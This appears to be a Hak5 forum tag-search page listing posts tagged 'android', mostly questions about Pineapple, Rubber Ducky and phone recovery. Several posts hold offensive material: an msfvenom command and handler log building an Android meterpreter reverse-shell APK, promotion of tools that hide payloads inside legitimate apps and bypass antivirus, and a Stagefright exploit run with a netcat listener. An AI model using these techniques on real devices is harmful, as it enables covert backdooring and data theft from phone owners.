Jump to content

Search the Community

Showing results for tags 'android'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Hi guys & girls, what is the best way to root an android tablet? The tablet in question is a Asus Zen pad z300m. was wondering if Kali linux would run on this device? if not, what can I install on the tablet to learn wireless security. Can I also install nmap?
  2. I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  3. Hello, I just found out android phone sends requests to some Google domain i.e. http://clients1.google.com/ http://clients3.google.com/ http://connectivitycheck.gstatic.com http://connectivitycheck.android.com to check if they are connected to Internet or not. I need to redirect these domains requests made by android to my captive portal in Linux after they are connected to my wifi hosted by my PC. It doesn't matter whether they access internet after redirecting to my CP. I just need to configure my AP to redirect these requests to my CP in linux. How can I do it? I am using Kali Linux 2.0 Thank you
  4. Hello everyone, I just purchased the Bash Bunny, i wanted to see if i could make an .APK execute on an android device. How would i go about coding that, i know that i need to call the file. It is possible that i can do that?
  5. Hello, everyone I have successfully used metasploit to hack android on LAN using my own android Hotspot connection. Now, I want to know how to use metasploit over WAN using the same. I can only connect my Kali Machine to my android Hotspot connection for Internet connectivity. I have searched over net there are solutions like SSH tunneling and port forward from your android. Some are saying that your ISP must have blocked the LPORT that you have used. Some are suggesting using VPN. I am really confused what to do can anyone help me out.
  6. I just received my Pineapple nano today and installed everything on my laptop running Windows. I also wanted to ensure I could use the same nano on my android when I'm mobile, but I'm running into difficulties getting the android to connect to the nano. The pineapple connector app prompts for USB tethering, which is enabled, but continually attempts to connect with no result and no installation screen...just the loading circle. Any advice or assistance would be much appreciated. I wasn't sure if its because now that the pineapple nano has been setup via the Windows environment if there is an alternative way I have to connect the pineapple to interface with other environments as well (i.e. Linux/Android). Chris
  7. Hello, After doing some reading on the SMB Exfiltration, would it be possible to create the same kind of payload but for an Android phone? Say for someone to connect the BB to an Android phone and copy over a certain file.
  8. How would I go about getting an ARM version of ADB working on the bash bunny? I tried using Google's Python implementation of ADB, but it required libusb1 and other dependencies. The goal is to make a payload that: Enabled USB debugging (HID) Accepts connection to device (HID) ADB Install's package (bash) ADB launches package (bash) I had the HID payload working for enabling USB debugging, but then realized ADB was for x64 processors. I found a couple ARM versions, but couldn't get any of them working properly. Can anyone help me out with this. Ideally, I would like to utilize my apkwash script (https://github.com/jbreed/apkwash) to generate a lightweight payload to use for pushing onto a device. With ADB you can also attempt gaining root as well through ADB methods that otherwise wouldn't be accessible.
  9. Hello everyone, This weekend I got a little bored and began toying with Android payloads to just toy with a meterpreter shell to see how it is. Upon doing so, I noticed the payload generated from msfvenom required I ignore my AV to install. So this sent me down a path to bypass antivirus, which come to find out WAS EXTREMELY EASY! I began with apkwash, which simply takes the msfvenom generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload that would make this awesome. Otherwise, you would need a couple minutes alone with their unlocked phone. Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way other than injecting the same AV bypassing payload into a legit app? Well, some people had example on how to do this online, but required a long process to manually do it all. Why not script it? Well, each app is different so this can be hit or miss so I allowed manual pieces for those special apps. The result was apkinjector, which with utilizing the apkwash technique of AV bypass is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is APKTool has issues with certain packages (Facebook, Starbucks, etc). I have had success injecting into about 70-80% of .apk files. Github: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector
  10. Hello, I'm trying to make a ducky script for Android and I can't find an official Ducky Script Syntax for the up/down/left/right arrows or other country specific keys. Is there any documentation on this topic?
  11. Hello guys!! I really need some help. I have no idea about hacking. I purchase a rubber ducky as I saw that it is possible to enable developer options on an Android phone. I have an S5 that by an accident got the screen cracked and it works fine...but I dont see a single pixel on the screen...I can receive texts (I can her them). I need to recover my files, photos, etc. I craving for help. I need guide how to do that (enable developer options) as I found a software to recover the info but it needs the Developer Option enabled. I appreciate any help on this.
  12. Hi guys! It's been now a month that I'm using my Nano and I'm really happy about it! But today I wanted to test the Nano with my phone. I plugged my portable Battery, plugged my phone and everything seems to work. But now I have a question. Since my phone have a USB-C port and I have a USB-C OTG Cable. Why the Nano can't be powered only by using this cable? Did I really need to get my battery every time I want to use my Nano with my phone? Or have you another setup, more simple? Thanks for your attention, have a nice day! (PS: Sorry for bad english)
  13. So the pineapple has an APP in the android market. Anyone thought of making an app for the Ducky? Would be nice to be able to flash and adjust payloads on the go with an android device. Select the payloads through the app, dl them to our android device and flash them to the duck at will. Could also have a live editor to compile our own payloads. 1. could android flash the duck? / drivers out there for it? 2. anyone want to write the app? -thought process here is that we are mobile most of the time. half or our gear is ready to go. Using our mobile device vs a computer would make more sense to me to be less visible when it comes down to blending in on a pen test. Don't have to stop there, could be all the Hak5 tools wrapped into one app that have an interface. Lan turtle, etc. --- anyone? --- thoughts?
  14. Hi, My girlfriend managed to broke her phone's screen to a point where it stays black, but does otherwise work. The device is password protected, but the password itself is known. However there's no way to input it unless using a USB Rubber Ducky. Could someone help me to get my GF's pictures backed up and to enable the USB Debugging? The most important thing is to get the device unlocked so I can access the files on it. Phone model is: Samsung J5 (SM-J500FN) and it's running either Android 5.x.x or 6.x.x.
  15. So. I bought a USB Ducky with the hope that it would allow me to enable USB Debugging and set file transfer to MTP mode on my wife's broken Samsung Galaxy S6 with a broken screen, in order to get two years of family photos that she wasn't backing up off the now totally inaccessible phone. I have almost no coding experience (as in, I made a Geocities site in the 90s and learned some basic HTML, and that's it). So when I discovered that the code written by folks a few years back to do this hack to phones on Android 4 wouldn't work at all on Android 6, I gave up hope. For a minute. Then I decided I'd try it myself. I discovered, through trial and error, that this version of android doesn't accept rapid-fire input from a keyboard. A default delay of 300 was needed to prevent the phone from missing commands. If I had to guess, I'd say the Google people got wise and built this in to try to prevent this kind of attack. Still, the code below does work. It does three things: It enables developer mode, enables USB Debugging, and changes the USB behavior from Charging to MTP. If your USB behavior is already MTP, it'll change it to PTP, so edit that if you need to. Anyway, thought I'd share. It did work. Best of luck, especially to others are having similar problems and hoping for an aquatic foul based answer. DEFAULT_DELAY 300 REM Enable Developer options and usb debugging on Android REM Author: SamR REM Tested on Galaxy S6 REM Android Version 6.0.1 REM To start at the home screen ESCAPE ESCAPE ESCAPE ESCAPE ALT ESCAPE DELAY 500 REM To enter settings DOWN DOWN DOWN ENTER ENTER DELAY 500 STRING s STRING e STRING t STRING t STRING i STRING n STRING g STRING s DELAY 500 DOWN ENTER DELAY 500 REM To Access About Device RIGHT RIGHT RIGHT RIGHT RIGHT RIGHT RIGHT RIGHT DOWN DOWN DOWN DOWN DOWN DOWN ENTER REM To Enable Developer Options DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN ENTER ENTER ENTER ENTER ENTER ENTER ENTER DELAY 500 REM To Enable USB Debugging ESCAPE UP ENTER DOWN DOWN DOWN DOWN DOWN DOWN ENTER DELAY 500 TAB ENTER REM Set To MTP DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN ENTER DOWN ENTER REM Return To Home ESCAPE ESCAPE ESCAPE ESCAPE
  16. I was thinking about how the pine64 and similar boards have this hdmi with touchscreen support outs, might be in the form of capabilities. By this, my question or purpose of topic is; Would it be possible to utilize the hdmi out technology available on the android or mainstream (Apple,Microsoft) based cellular devices, by turning them into the receiver of the pine64 board's hdmi output? Would it be possible to flash old android hardware to be a fully featured touchscreen for that specific and expandable purpose? or, are there any ways to utilize the digitizer (touch-screen) from older cell-tech? It's hard to explain what i'd like to do, but the best way I can describe it would be to reference a commercial product such as the name brand of a router, with an old school (original palm pilot aka palm pda) touch screen or maybe it's a tft touch screen i'm unsure... I just am not sure of what kind of links would break the rules, so if there's any admin reviewing this before posting.. Feel free to point me in the right direction please. Ty.
  17. Hi all, Its showing as android os mobiles like samsung,motorola,etc but the wifi access point ssid be like random letters with open access.I have connected those wifi but there's no internet connection.I am curious about the app and whats will be fun with it. any suggestions? Thanks
  18. I have recently purchased a WiFi Pineapple Nano an I am trying to connect it to my android. I watched the video on youtube and followed the instructions to an exact yet it just gets stuck at "Waiting for the WiFi Pineapple to make a connection. My phone is a AT&T Samsung Galaxy S7, Model Number: G930A Version: 6.0.1 if that helps. I am using the USB adapter that comes with the product attached to my PC and my USB charger connecting to the pineapple. Is there anything im doing wrong? Thanks!
  19. I recently got my Nano and am currently on a vertical learning curve. Today I plugged a USB Wifi adapter into Nano and set my Samsung Galaxy S5 as a WiFi hotspot. Went into Client Mode setup but it does not see Android hotspot. Picks up and works with other Wifi access points ok, but does not see S5 hotspot? Any ideas? R.
  20. Hi All, Working on a new infusion that assist with using the WiFiPineapple as a war driving device. The infusion and packages add GPS support to the already existing kismet package. As well as the ability to use an Android device as the GPS. Prebuilt packages and sources available here: http://magikh0e.ihtb.org/wifipineapple/. I have already started the basics of the infusion any ideas or comments would be appreciated! Below is some screenshots of what I have done so far. Packages Required kismet_server (main repo) libgps (my repo) libgpsd (my repo) gpsd (my repo) adb (my repo) Devices Tested Nexus 6 Samsung Galaxy S3 Nexus 7 2013 (wifi) OnePlus One (thx reckt0r) Android Versions Tested Android 5.1 (lollipop) Android 4.4.4 (KitKat) Help Screen GPS Setup Small tile XML output download Using the *.netxml files you can convert them into KML format using giskismet, then load the KML file into Google Earth and get something similar to below. Tutorial on the conversion process located here: http://magikh0e.ihtb.org/pubPapers/Kismet-AndroidGPS.html
  21. Might be of use to those running an iOS device, and hence no tethering; I've picked up an LG Leon for £50 from EE. It's PAYG and EE allow tethering, some network operators block PAYG tethering. Just tested the Pineapple app and tethering, all good. I don't work for EE, just passing the info on. the phone itself is very unremarkable Looking forward to playing around with the Nano on my commute now! *edit: it's an Android device
  22. Can we bypassing HSTS by using this MITM technique? The attack works on latest versions of iOS including iOS 8.1.1 and On most Android devices. Source: https://blog.zimperium.com/doubledirect-zimperium-discovers-full-duplex-icmp-redirect-attacks-in-the-wild/
  23. Hi guys, after the discovery of the Stagefright bug, the researcher of Zimperium have post a python script for the specific module CVE 1538. I've download it and i've try to execute this on my Android phone with Lollipop 5.0. Before this, i've downloaded the apk of zimperium to test if my phone is vulnerable. The app show me, in green, the module CVE-1538 e other... After this, on my linux pc with python 2.7.x, i've renamed the script in mp4.py for resolve an error of import. After this i've tried to generate the file.mp4 with this command: $python2 mp4.py -c [LAN IP] -p 4444 The script correctly generate an file.mp4 without an error. After i've launch a listener with: $netcat -l -p 4444 I've sended the file.mp4 to my smartphone and i've tried to exec this. The terminal with netcat don't show anything, no result, nisba, nada... I've tried with metasploit listener with multi/hanlder but with a same result. Any solution? Thanks everyone and sorry for my english ;-P
  24. Hi all, Is there a way to load multiple payloads for different mobile phones on to one Rubber Ducky, and then get the payload to recognise the model of the phone it has been plugged in to and run the appropriate payload? Thank you, Haze
  25. Hi all, Apologies if this has been asked before, I'm new here and I had a good look around the forum but couldn't find anything related. When using the Rubby Ducky to run commands on a mobile phone, you have to of course use the equivilent of keyboard shortcuts, for example the shortcuts found here; http://www.pcworld.com/article/184656/android_keyboard_shortcuts.html Is there a website or resource available that lists the shortcuts for multiple phones, so regardless of which mobile phone I wanted to create a payload for, I could easily look up the shortcuts required to type up the payload? It'd be nice to not have to scour the internet for an hour each time I wish to create a payload for a different phone, trying to find it's keyboard shortcuts. Thanks all, Haze
×
×
  • Create New...